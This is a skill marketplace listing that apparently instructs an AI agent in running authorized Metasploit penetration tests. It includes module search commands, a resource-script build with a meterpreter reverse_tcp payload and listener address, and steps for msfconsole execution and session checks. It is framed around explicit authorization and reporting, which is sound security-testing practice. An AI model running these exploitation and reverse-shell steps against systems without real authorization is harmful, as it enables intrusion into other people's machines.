🎁 Get the FREE AI Skills Starter Guide β€” Subscribe β†’
BytesAgainBytesAgain
πŸ¦€ ClawHub

metasploit

by @zengyuxiu

Plan and execute authorized Metasploit assessments for OpenClaw tasks with repeatable workflows, including target triage, exploit module selection, option tu...

Versionv1.0.0
Downloads1,078
Stars⭐ 1
TERMINAL
clawhub install metasploit-skill

πŸ“– About This Skill


name: openclaw-metasploit description: Plan and execute authorized Metasploit assessments for OpenClaw tasks with repeatable workflows, including target triage, exploit module selection, option tuning, .rc generation, controlled execution, and evidence-focused reporting. Use when requests involve msfconsole operations, module/payload matching, exploit/check automation, session verification, or pentest result writeups.

OpenClaw Metasploit

Overview

Use this skill to run deterministic and auditable Metasploit workflows for authorized security testing. Prefer a check-first workflow and generate repeatable .rc scripts via scripts/build_rc.py instead of ad hoc console typing.

Workflow Decision Tree

1. Confirm authorization and scope before any technical step. 2. Collect target facts: service, version, network position, and constraints. 3. Select candidate modules and payloads using module-selection.md. 4. Generate and review a resource script with scripts/build_rc.py. 5. Execute in msfconsole with check before run or exploit. 6. Validate outcome with session and artifact evidence. 7. Produce a concise report with reproducible commands and findings.

Step 1: Confirm Scope and Safety

Require explicit confirmation of:

  • Target ownership or testing authorization
  • In-scope hosts, ports, and time window
  • Forbidden techniques (DoS, persistence, data exfiltration)
  • If scope is unclear, stop and ask for clarification before proceeding.

    Step 2: Build Target Context

    Capture minimum actionable context:

  • Host and network placement
  • Service and version fingerprint
  • Authentication state
  • Environmental constraints (egress filtering, AV/EDR, uptime sensitivity)
  • Use this context to justify each module choice.

    Step 3: Select Modules and Payloads

    Use search and info in msfconsole to narrow candidates:

    search type:exploit cve:2023 service:http
    info exploit/linux/http/
    show options
    show payloads
    

    Choose modules by:

  • Reliability and target compatibility
  • Required options completeness
  • Post-exploit objective fit (shell type, architecture, privilege level)
  • For common mappings and tradeoffs, read module-selection.md.

    Step 4: Generate Resource Script

    Generate reproducible execution scripts:

    python3 scripts/build_rc.py \
      --module exploit/linux/http/example_module \
      --rhosts 10.10.10.15 \
      --rport 8080 \
      --payload linux/x64/meterpreter/reverse_tcp \
      --lhost 10.10.10.5 \
      --lport 4444 \
      --set TARGETURI=/app \
      --check \
      --job \
      --output run_example.rc
    

    Review generated commands before execution:

  • Confirm no out-of-scope hosts
  • Confirm payload and listener values
  • Confirm optional settings are intentional
  • Step 5: Execute in msfconsole

    Run with logging enabled:

    msfconsole -q -r run_example.rc
    

    Inside msfconsole, verify:

  • check output status
  • run or exploit result
  • sessions -l visibility
  • If exploitation fails, adjust one variable at a time and re-run.

    Step 6: Validate and Capture Evidence

    Minimum evidence set:

  • Module path and key options
  • Command/script used for execution
  • Check result and exploit result
  • Session details (type, user, host)
  • Relevant non-sensitive proof artifacts
  • Use workflow.md for command-level checklists and reporting structure.

    Step 7: Report

    Produce output with:

  • Objective and scope
  • Reproducible steps
  • Outcome and confidence
  • Impact summary
  • Recommended remediation and verification method
  • Keep reports concise and technically verifiable.

    Resources

    scripts/build_rc.py

    Generate a repeatable Metasploit .rc resource script from structured options.

    references/module-selection.md

    Module and payload selection heuristics with common service mappings.

    references/workflow.md

    Command checklist for execution, troubleshooting loop, and report field requirements.